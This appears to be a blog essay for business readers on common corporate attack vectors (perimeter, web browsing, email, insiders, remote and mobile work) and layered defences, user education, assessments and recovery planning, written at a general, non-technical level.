Cybersecurity has become a fundamental part of doing business. Regardless of size or industry, organizations are expected to invest significant time, money, and resources simply to protect their operations, employees, and information.
Rather than focusing on specific technologies, vendors, or network architectures, I would like to take a more practical approach. How can a company be attacked? What are the most common attack vectors? And what options are available to reduce risk?
Understanding the attack surface
The first thing to consider is how a company’s information can be attacked. Let’s look at the following example:
We have employees working both inside and outside the office, connected directly or remotely to the corporate network and to the cloud services the company uses (AWS, Azure, Google Cloud, and others).
Where can attacks come from? Broadly speaking, we can identify three main attack vectors:
- The company is attacked from outside its network.
- The company is attacked from within its own network.
- The company is attacked through its employees via different channels.
External attacks: the traditional perimeter
Historically (if we can even speak of history in a field that has evolved so rapidly), organizations have protected access to their networks and the Internet through firewalls and intelligent network devices capable of managing traffic and blocking unauthorized connections according to predefined security rules.
This is the most common layer of protection, and it is fair to say that most companies, whether small, medium-sized, or large, have implemented it to a reasonable extent. Because these technologies have been around for many years, there is a large pool of professionals capable of deploying and managing them, and competition has made them more affordable and easier to implement.
This is undoubtedly a mandatory first step for any organization.
Does this mean that buying good hardware automatically makes a company secure? Unfortunately, no.
There are many ways to bypass a firewall, particularly when web browsing is an essential part of daily work.
The hidden risks of web browsing
A very simple example: open your browser and visit any website. In the image below, you can see the result of a Google search displayed in Google Chrome.
I accessed the browser’s Developer Tools, a feature available to anyone. What appears on the screen is JavaScript code.
Why? Because the webpage itself does not really exist in the way most people imagine. When we access a website, our browser downloads code and executes it locally, building the page according to the instructions contained in that code, including headlines, links, images, videos, and interactive elements.
The browser is effectively interpreting and executing a program.
At this point, it becomes easier to understand the risk of visiting a website created by someone with malicious intent. We may see a perfectly normal webpage while malicious code is being executed in the background.
And we should not forget that our computer is connected to the company’s network.
Organizations work hard to restrict access to risky websites, but employees need access to a vast number of online resources to perform their jobs. Controlling everything through this approach alone is extremely difficult.
Email remains one of the most effective attack vectors
Another major attack vector is email.
Emails often bypass traditional perimeter controls and, in many cases, successfully reach employees’ inboxes.
How can an email deceive us?
- Through social engineering, convincing us to reveal information or perform actions we should not.
- Through seemingly legitimate links that redirect us to malicious websites.
- Through attachments that may contain malware, such as trojans, worms, or ransomware.
Companies invest in email security solutions and employee awareness programs to help identify warning signs and reduce risk.
Internal threats and privileged access
Not all threats come from outside.
Organizations must also consider internal threats, whether from dissatisfied employees, accidental misuse, or, in highly sensitive sectors such as defense or government, individuals attempting to gain unauthorized access to confidential information.
Without properly defined access policies, even trusted users can become a significant source of risk.
Remote work and mobile devices
One of the biggest challenges facing organizations today is securing employees who work remotely or are constantly on the move.
Most companies implement strict access policies, requiring employees to connect through authorized devices, encrypted communication channels such as VPNs, and multiple forms of authentication.
However, in our daily lives, we access countless websites, applications, and social media platforms. We are often redirected between services without even noticing.
No matter how careful we are, we remain attractive targets for threat actors seeking to gain access to corporate environments.
Smartphones present additional challenges. Even official app stores such as Apple App Store and Google Play are not completely free from malicious applications. We may never install them ourselves, but family members using the same home network could unknowingly introduce risks.
To address these concerns, organizations increasingly separate personal and corporate environments on devices, deploy endpoint protection solutions, enforce security policies, and implement controls to protect data in case of loss or theft.
Building layers of defence
Having reviewed the vulnerabilities we face and the resources organizations must dedicate simply to protect themselves, we can now consider how companies defend their environments.
One of the most effective approaches is network segmentation.
Organizations divide their networks into different layers or zones and enforce strict controls between them. This limits the spread of an attack and prevents a compromise in one area from affecting critical business systems.
Of course, these controls come at a cost. They require investment, maintenance, and expertise. They can also introduce complexity and occasionally impact performance.
However, they remain essential components of a modern cybersecurity strategy.
From antivirus to behavioural detection
Beyond network protection, organizations deploy solutions designed to identify abnormal behaviour on endpoints and devices.
Traditional antivirus solutions rely on signatures, known patterns associated with previously identified malware. They continuously scan systems in search of these signatures and block threats when detected.
Modern cybersecurity solutions have evolved significantly.
Today, technologies such as EDR (Endpoint Detection and Response), NDR (Network Detection and Response), XDR (Extended Detection and Response), and mobile threat defence solutions use behavioural analysis and artificial intelligence to identify suspicious activity.
For example, if an employee who normally uses Excel and SAP suddenly begins generating multiple connections to an unknown external server, that behaviour may indicate a compromise and trigger an investigation.
These technologies represent some of the most advanced defensive capabilities currently available.
How much cybersecurity is enough?
At this point, a reasonable question arises:
How much should I invest in cybersecurity?
How far should I go to protect my business without turning cybersecurity into an economic burden?
My personal view is that organizations should be realistic.
Absolute security does not exist. No matter how much we invest, there will always be new threats, new vulnerabilities, and people looking for ways to exploit them.
As long as we comply with the regulations applicable to our industry, cybersecurity should be approached as a balance between risk, cost, and business needs.
The human factor: the most important investment
In my opinion, the most valuable investment any organization can make is education.
Many people are not fully aware of what exists on the Dark Web, how easily stolen information can be obtained, or how accessible attack tools have become.
There are highly skilled threat actors who continuously look for new ways to exploit vulnerabilities for financial gain.
Educating users is the first step in reducing risk.
If employees can identify suspicious emails, follow security policies, and use corporate resources responsibly, organizations can significantly reduce one of their largest attack surfaces: human error.
Security policies, segmentation and access control
Another key investment is network segmentation and access control.
Organizations should ensure that users only have access to the information and resources required to perform their jobs. This follows the principle of least privilege, often referred to as “need to know.”
Security policies should also govern the devices connecting to corporate networks.
A VPN does not prevent a device from becoming infected. It simply secures the communication path between the device and the company network.
Organizations must therefore strike a balance between strong security controls and employee productivity, ensuring that protection measures do not become obstacles to daily work.
Start with an assessment
For organizations without a dedicated cybersecurity department, the most useful first step is often a cybersecurity assessment.
Such assessments go beyond purely technical considerations. They typically include compliance requirements related to regulations and standards such as GDPR, NIS2, ISO frameworks, and other applicable obligations.
The result is usually a practical roadmap that helps organizations understand their current position, identify weaknesses, prioritize improvements, and estimate the real cost of a cybersecurity strategy.
Business continuity matters as much as prevention
Finally, organizations must accept a simple reality: despite all our efforts, attacks can still succeed.
That is why cybersecurity is not only about prevention but also about recovery.
Backup strategies, incident response plans, and disaster recovery procedures should be carefully designed and tested long before they are needed.
When a serious incident occurs, affecting business operations and creating pressure across the organization, it is not the right time to start improvising.
A well-prepared recovery strategy can make the difference between a temporary disruption and a major business crisis.
